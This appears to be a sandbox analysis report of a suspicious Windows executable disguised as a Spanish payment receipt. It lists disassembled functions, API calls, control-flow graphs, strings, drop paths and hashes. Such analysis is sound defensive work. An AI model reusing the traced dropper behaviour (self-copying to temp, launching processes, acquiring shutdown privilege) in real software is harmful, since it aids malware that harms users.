4034 406507 lstrcpynW 4029->4034 4031 401bdd 4036 406507 lstrcpynW 4031->4036 4033->4029 4034->4031 4035->4025 4036->4027 4631 40261c 4632 402da6 17 API calls 4631->4632 4633 402623 4632->4633 4636 405ff7 GetFileAttributesW CreateFileW 4633->4636 4635 40262f 4636->4635 4051 40259e 4062 402de6 4051->4062 4054 402d84 17 API calls 4055 4025b1 4054->4055 4056 4025d9 RegEnumValueW 4055->4056 4057 4025cd RegEnumKeyW 4055->4057 4060 40292e 4055->4060 4058 4025f5 RegCloseKey 4056->4058 4059 4025ee 4056->4059 4057->4058 4058->4060 4059->4058 4063 402da6 17 API calls 4062->4063 4064 402dfd 4063->4064 4065 406374 RegOpenKeyExW 4064->4065 4066 4025a8 4065->4066 4066->4054 4644 40149e 4645 4014ac PostQuitMessage 4644->4645 4646 40239d 4644->4646 4645->4646 4647 404622 4648 40463a 4647->4648 4655 404754 4647->4655 4652 404463 18 API calls 4648->4652 4649 4047be 4650 404888 4649->4650 4651 4047c8 GetDlgItem 4649->4651 4658 4044ca 8 API calls 4650->4658 4653 4047e2 4651->4653 4654 404849 4651->4654 4657 4046a1 4652->4657 4653->4654 4662 404808 SendMessageW LoadCursorW SetCursor 4653->4662 4654->4650 4663 40485b 4654->4663 4655->4649 4655->4650 4656 40478f GetDlgItem SendMessageW 4655->4656 4680 404485 KiUserCallbackDispatcher 4656->4680 4660 404463 18 API calls 4657->4660 4661 404883 4658->4661 4665 4046ae CheckDlgButton 4660->4665 4681 4048d1 4662->4681 4667 404871 4663->4667 4668 404861 SendMessageW 4663->4668 4664 4047b9 4670 4048ad SendMessageW 4664->4670 4678 404485 KiUserCallbackDispatcher 4665->4678 4667->4661 4669 404877 SendMessageW 4667->4669 4668->4667 4669->4661 4670->4649 4673 4046cc GetDlgItem 4679 404498 SendMessageW 4673->4679 4675 4046e2 SendMessageW 4676 404708 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4675->4676 4677 4046ff GetSysColor 4675->4677 4676->4661 4677->4676 4678->4673 4679->4675 4680->4664 4684 405b2d ShellExecuteExW 4681->4684 4683 404837 LoadCursorW SetCursor 4683->4654 4684->4683 3443 4015a3 3444 402da6 17 API calls 3443->3444 3445 4015aa SetFileAttributesW 3444->3445 3446 4015bc 3445->3446 3556 401fa4 3557 402da6 17 API calls 3556->3557 3558 401faa 3557->3558 3559 405569 24 API calls 3558->3559 3560 401fb4 3559->3560 3571 405aea CreateProcessW 3560->3571 3565 401fcf 3567 401fd4 3565->3567 3568 401fdf 3565->3568 3566 40292e 3579 40644e wsprintfW 3567->3579 3570 401fdd CloseHandle 3568->3570 3570->3566 3572 401fba 3571->3572 3573 405b1d CloseHandle 3571->3573 3572->3566 3572->3570 3574 40697f WaitForSingleObject 3572->3574 3573->3572 3575 406999 3574->3575 3576 4069ab GetExitCodeProcess 3575->3576 3580 406910 3575->3580 3576->3565 3579->3570 3581 40692d PeekMessageW 3580->3581 3582 406923 DispatchMessageW 3581->3582 3583 40693d WaitForSingleObject 3581->3583 3582->3581 3583->3575 3584 4056a8 3585 405852 3584->3585 3586 4056c9 GetDlgItem GetDlgItem GetDlgItem 3584->3586 3588 405883 3585->3588 3589 40585b GetDlgItem CreateThread CloseHandle 3585->3589 3629 404498 SendMessageW 3586->3629 3591 4058ae 3588->3591 3593 4058d3 3588->3593 3594 40589a ShowWindow ShowWindow 3588->3594 3589->3588 3632 40563c OleInitialize 3589->3632 3590 405739 3598 405740 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3590->3598 3592 40590e 3591->3592 3595 4058c2 3591->3595 3596 4058e8 ShowWindow 3591->3596 3592->3593 3606 40591c SendMessageW 3592->3606 3597 4044ca 8 API calls 3593->3597 3631 404498 SendMessageW 3594->3631 3600 40443c SendMessageW 3595->3600 3602 405908 3596->3602 3603 4058fa 3596->3603 3601 4058e1 3597->3601 3604 405792 SendMessageW SendMessageW 3598->3604 3605 4057ae 3598->3605 3600->3593 3608 40443c SendMessageW 3602->3608 3607 405569 24 API calls 3603->3607 3604->3605 3609 4057c1 3605->3609 3610 4057b3 SendMessageW 3605->3610 3606->3601 3611 405935 CreatePopupMenu 3606->3611 3607->3602 3608->3592 3612 404463 18 API calls 3609->3612 3610->3609 3613 406544 17 API calls 3611->3613 3615 4057d1 3612->3615 3614 405945 AppendMenuW 3613->3614 3616 405962 GetWindowRect 3614->3616 3617 405975 TrackPopupMenu 3614->3617 3618 4057da ShowWindow 3615->3618 3619 40580e GetDlgItem SendMessageW 3615->3619 3616->3617 3617->3601 3620 405990 3617->3620 3621 4057f0 ShowWindow 3618->3621 3622 4057fd 3618->3622 3619->3601 3623 405835 SendMessageW SendMessageW 3619->3623 3624 4059ac SendMessageW 3620->3624 3621->3622 3630 404498 SendMessageW 3622->3630 3623->3601 3624->3624 3625 4059c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3624->3625 3627 4059ee SendMessageW 3625->3627 3627->3627 3628 405a17 GlobalUnlock SetClipboardData CloseClipboard 3627->3628 3628->3601 3629->3590 3630->3619 3631->3591 3633 4044af SendMessageW 3632->3633 3634 40565f 3633->3634 3637 401389 2 API calls 3634->3637 3638 405686 3634->3638 3635 4044af SendMessageW 3636 405698 CoUninitialize 3635->3636 3637->3634 3638->3635 4685 40202a 4686 402da6 17 API calls 4685->4686 4687 402031 4686->4687 4688 4068d4 5 API calls 4687->4688 4689 402040 4688->4689 4690 4020cc 4689->4690 4691 40205c GlobalAlloc 4689->4691 4691->4690 4692 402070 4691->4692 4693 4068d4 5 API calls 4692->4693 4694 402077 4693->4694 4695 4068d4 5 API calls 4694->4695 4696 402081 4695->4696 4696->4690 4700 40644e wsprintfW 4696->4700 4698 4020ba 4701 40644e wsprintfW 4698->4701 4700->4698 4701->4690 4702 40252a 4703 402de6 17 API calls 4702->4703 4704 402534 4703->4704 4705 402da6 17 API calls 4704->4705 4706 40253d 4705->4706 4707 402548 RegQueryValueExW 4706->4707 4709 40292e 4706->4709 4708 402568 4707->4708 4710 40256e RegCloseKey 4707->4710 4708->4710 4713 40644e wsprintfW 4708->4713 4710->4709 4713->4710 4714 404caa 4715 404cd6 4714->4715 4716 404cba 4714->4716 4718 404d09 4715->4718 4719 404cdc SHGetPathFromIDListW 4715->4719 4725 405b4b GetDlgItemTextW 4716->4725 4721 404cec 4719->4721 4724 404cf3 SendMessageW 4719->4724 4720 404cc7 SendMessageW 4720->4715 4722 40140b 2 API calls 4721->4722 4722->4724 4724->4718 4725->4720 4726 4021aa 4727 402da6 17 API calls 4726->4727 4728 4021b1 4727->4728 4729 402da6 17 API calls 4728->4729 4730 4021bb 4729->4730 4731 402da6 17 API calls 4730->4731 4732 4021c5 4731->4732 4733 402da6 17 API calls 4732->4733 4734 4021cf 4733->4734 4735 402da6 17 API calls 4734->4735 4736 4021d9 4735->4736 4737 402218 CoCreateInstance 4736->4737 4738 402da6 17 API calls 4736->4738 4741 402237 4737->4741 4738->4737 4739 401423 24 API calls 4740 4022f6 4739->4740 4741->4739 4741->4740 4742 401a30 4743 402da6 17 API calls 4742->4743 4744 401a39 ExpandEnvironmentStringsW 4743->4744 4745 401a4d 4744->4745 4747 401a60 4744->4747 4746 401a52 lstrcmpW 4745->4746 4745->4747 4746->4747 3744 4023b2 3745 4023c0 3744->3745 3746 4023ba 3744->3746 3748 402da6 17 API calls 3745->3748 3750 4023ce 3745->3750 3747 402da6 17 API calls 3746->3747 3747->3745 3748->3750 3749 402da6 17 API calls 3753 4023e5 WritePrivateProfileStringW 3749->3753 3751 402da6 17 API calls 3750->3751 3752 4023dc 3750->3752 3751->3752 3752->3749 4760 402434 4761 402467 4760->4761 4762 40243c 4760->4762 4763 402da6 17 API calls 4761->4763 4764 402de6 17 API calls 4762->4764 4765 40246e 4763->4765 4766 402443 4764->4766 4771 402e64 4765->4771 4768 402da6 17 API calls 4766->4768 4770 40247b 4766->4770 4769 402454 RegDeleteValueW RegCloseKey 4768->4769 4769->4770 4772 402e78 4771->4772 4774 402e71 4771->4774 4772->4774 4775 402ea9 4772->4775 4774->4770 4776 406374 RegOpenKeyExW 4775->4776 4777 402ed7 4776->4777 4778 402ee7 RegEnumValueW 4777->4778 4779 402f0a 4777->4779 4786 402f81 4777->4786 4778->4779 4780 402f71 RegCloseKey 4778->4780 4779->4780 4781 402f46 RegEnumKeyW 4779->4781 4782 402f4f RegCloseKey 4779->4782 4784 402ea9 6 API calls 4779->4784 4780->4786 4781->4779 4781->4782 4783 4068d4 5 API calls 4782->4783 4785 402f5f 4783->4785 4784->4779 4785->4786 4787 402f63 RegDeleteKeyW 4785->4787 4786->4774 4787->4786 4795 401735 4796 402da6 17 API calls 4795->4796 4797 40173c SearchPathW 4796->4797 4798 401757 4797->4798 4799 401d38 4800 402d84 17 API calls 4799->4800 4801 401d3f 4800->4801 4802 402d84 17 API calls 4801->4802 4803 401d4b GetDlgItem 4802->4803 4804 402638 4803->4804 4805 4014b8 4806 4014be 4805->4806 4807 401389 2 API calls 4806->4807 4808 4014c6 4807->4808 4816 40263e 4817 402652 4816->4817 4818 40266d 4816->4818 4821 402d84 17 API calls 4817->4821 4819 402672 4818->4819 4820 40269d 4818->4820 4822 402da6 17 API calls 4819->4822 4823 402da6 17 API calls 4820->4823 4828 402659 4821->4828 4824 402679 4822->4824 4825 4026a4 lstrlenW 4823->4825 4833 406529 WideCharToMultiByte 4824->4833 4825->4828 4827 40268d lstrlenA 4827->4828 4829 4026e7 4828->4829 4830 4026d1 4828->4830 4832 4060d8 5 API calls 4828->4832 4830->4829 4831 4060a9 WriteFile 4830->4831 4831->4829 4832->4830 4833->4827

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 004034F7 Relevance: 88.0, APIs: 33, Strings: 17, Instructions: 450stringfilecomCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 4034f7-403547 SetErrorMode GetVersionExW 1 403581-403588 0->1 2 403549-40357d GetVersionExW 0->2 3 403592-4035d2 1->3 4 40358a 1->4 2->1 5 4035d4-4035dc call 4068d4 3->5 6 4035e5 3->6 4->3 5->6 11 4035de 5->11 8 4035ea-4035fe call 406864 lstrlenA 6->8 13 403600-40361c call 4068d4 * 3 8->13 11->6 20 40362d-40368f #17 OleInitialize SHGetFileInfoW call 406507 GetCommandLineW call 406507 13->20 21 40361e-403624 13->21 28 403691-403693 20->28 29 403698-4036ab call 405e03 CharNextW 20->29 21->20 25 403626 21->25 25->20 28->29 32 4037a2-4037a8 29->32 33 4036b0-4036b6 32->33 34 4037ae 32->34 35 4036b8-4036bd 33->35 36 4036bf-4036c5 33->36 37 4037c2-4037dc GetTempPathW call 4034c6 34->37 35->35 35->36 38 4036c7-4036cb 36->38 39 4036cc-4036d0 36->39 47 403834-40384c DeleteFileW call 40307d 37->47 48 4037de-4037fc GetWindowsDirectoryW lstrcatW call 4034c6 37->48 38->39 41 403790-40379e call 405e03 39->41 42 4036d6-4036dc 39->42 41->32 59 4037a0-4037a1 41->59 45 4036f6-40372f 42->45 46 4036de-4036e5 42->46 53 403731-403736 45->53 54 40374b-403785 45->54 51 4036e7-4036ea 46->51 52 4036ec 46->52 64 403852-403858 47->64 65 403a23-403a31 call 403adc OleUninitialize 47->65 48->47 62 4037fe-40382e GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034c6 48->62 51->45 51->52 52->45 53->54 61 403738-403740 53->61 57 403787-40378b 54->57 58 40378d-40378f 54->58 57->58 63 4037b0-4037bd call 406507 57->63 58->41 59->32 66 403742-403745 61->66 67 403747 61->67 62->47 62->65 63->37 69 40385e-403871 call 405e03 64->69 70 4038ff-403906 call 403bb6 64->70 77 403a33-403a42 call 405b67 ExitProcess 65->77 78 403a48-403a4e 65->78 66->54 66->67 67->54 84 4038c3-4038d0 69->84 85 403873-4038a8 69->85 80 40390b-40390e 70->80 82 403a50-403a65 GetCurrentProcess OpenProcessToken 78->82 83 403ac6-403ace 78->83 80->65 91 403a96-403aa4 call 4068d4 82->91 92 403a67-403a90 LookupPrivilegeValueW AdjustTokenPrivileges 82->92 86 403ad0 83->86 87 403ad3-403ad6 ExitProcess 83->87 88 4038d2-4038e0 call 405ede 84->88 89 403913-403927 call 405ad2 lstrcatW 84->89 93 4038aa-4038ae 85->93 86->87 88->65 103 4038e6-4038fc call 406507 * 2 88->103 106 403934-40394e lstrcatW lstrcmpiW 89->106 107 403929-40392f lstrcatW 89->107 104 403ab2-403abd ExitWindowsEx 91->104 105 403aa6-403ab0 91->105 92->91 97 4038b0-4038b5 93->97 98 4038b7-4038bf 93->98 97->98 102 4038c1 97->102 98->93 98->102 102->84 103->70 104->83 111 403abf-403ac1 call 40140b 104->111 105->104 105->111 108 403a21 106->108 109 403954-403957 106->109 107->106 108->65 112 403960 call 405ab5 109->112 113 403959-40395e call 405a38 109->113 111->83 121 403965-403975 SetCurrentDirectoryW 112->121 113->121 123 403982-4039ae call 406507 121->123 124 403977-40397d call 406507 121->124 128 4039b3-4039ce call 406544 DeleteFileW 123->128 124->123 131 4039d0-4039e0 CopyFileW 128->131 132 403a0e-403a18 128->132 131->132 133 4039e2-403a02 call 4062c7 call 406544 call 405aea 131->133 132->128 134 403a1a-403a1c call 4062c7 132->134 133->132 142 403a04-403a0b CloseHandle 133->142 134->108 142->132
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 0040351A
                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00403543
                                                                                                                                                                                    • GetVersionExW.KERNEL32(0000011C), ref: 0040355A
                                                                                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
                                                                                                                                                                                    • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00403634
                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
                                                                                                                                                                                    • GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
                                                                                                                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Justificante pago-09453256434687.exe",00000020,"C:\Users\user\Desktop\Justificante pago-09453256434687.exe",00000000), ref: 004036A0
                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
                                                                                                                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
                                                                                                                                                                                    • DeleteFileW.KERNELBASE(1033), ref: 00403839
                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Justificante pago-09453256434687.exe",00000000,?), ref: 00403920
                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Justificante pago-09453256434687.exe",00000000,?), ref: 0040392F
                                                                                                                                                                                      • Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Justificante pago-09453256434687.exe",00000000,?), ref: 0040393A
                                                                                                                                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Justificante pago-09453256434687.exe",00000000,?), ref: 00403946
                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
                                                                                                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\Justificante pago-09453256434687.exe,00420EC8,00000001), ref: 004039D8
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
                                                                                                                                                                                    • OleUninitialize.OLE32(?), ref: 00403A28
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403A42
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403AD6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\Justificante pago-09453256434687.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes$C:\Users\user\Desktop$C:\Users\user\Desktop\Justificante pago-09453256434687.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                    • API String ID: 3859024572-1257580972
                                                                                                                                                                                    • Opcode ID: d026ce5e89d3d63a3cb2047e2171d7ed2e8d5a22846132119ce05c7a2189c2c0
                                                                                                                                                                                    • Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
                                                                                                                                                                                    • Opcode Fuzzy Hash: d026ce5e89d3d63a3cb2047e2171d7ed2e8d5a22846132119ce05c7a2189c2c0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D
                                                                                                                                                                                    Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 143 4056a8-4056c3 144 405852-405859 143->144 145 4056c9-405790 GetDlgItem * 3 call 404498 call 404df1 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405883-405890 144->147 148 40585b-40587d GetDlgItem CreateThread CloseHandle 144->148 167 405792-4057ac SendMessageW * 2 145->167 168 4057ae-4057b1 145->168 150 405892-405898 147->150 151 4058ae-4058b8 147->151 148->147 155 4058d3-4058dc call 4044ca 150->155 156 40589a-4058a9 ShowWindow * 2 call 404498 150->156 152 4058ba-4058c0 151->152 153 40590e-405912 151->153 157 4058c2-4058ce call 40443c 152->157 158 4058e8-4058f8 ShowWindow 152->158 153->155 161 405914-40591a 153->161 164 4058e1-4058e5 155->164 156->151 157->155 165 405908-405909 call 40443c 158->165 166 4058fa-405903 call 405569 158->166 161->155 169 40591c-40592f SendMessageW 161->169 165->153 166->165 167->168 172 4057c1-4057d8 call 404463 168->172 173 4057b3-4057bf SendMessageW 168->173 174 405a31-405a33 169->174 175 405935-405960 CreatePopupMenu call 406544 AppendMenuW 169->175 182 4057da-4057ee ShowWindow 172->182 183 40580e-40582f GetDlgItem SendMessageW 172->183 173->172 174->164 180 405962-405972 GetWindowRect 175->180 181 405975-40598a TrackPopupMenu 175->181 180->181 181->174 184 405990-4059a7 181->184 185 4057f0-4057fb ShowWindow 182->185 186 4057fd 182->186 183->174 187 405835-40584d SendMessageW * 2 183->187 188 4059ac-4059c7 SendMessageW 184->188 189 405803-405809 call 404498 185->189 186->189 187->174 188->188 190 4059c9-4059ec OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 4059ee-405a15 SendMessageW 190->192 192->192 193 405a17-405a2b GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405706
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405715
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405752
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 00405759
                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
                                                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
                                                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004057F5
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405816
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405724
                                                                                                                                                                                      • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405868
                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_0000563C,00000000), ref: 00405876
                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 0040587D
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004058A1
                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004058A6
                                                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 004058F0
                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00405935
                                                                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405949
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00405969
                                                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 004059CA
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 004059D0
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004059E6
                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00405A2B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                    • String ID: {
                                                                                                                                                                                    • API String ID: 590372296-366298937
                                                                                                                                                                                    • Opcode ID: b1b6d11e03e474fe05ed43e1ab8ee8a1b6ba8e9c1710d92ba4998ff04e9fb9cd
                                                                                                                                                                                    • Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
                                                                                                                                                                                    • Opcode Fuzzy Hash: b1b6d11e03e474fe05ed43e1ab8ee8a1b6ba8e9c1710d92ba4998ff04e9fb9cd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68
                                                                                                                                                                                    Function 00405C13 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
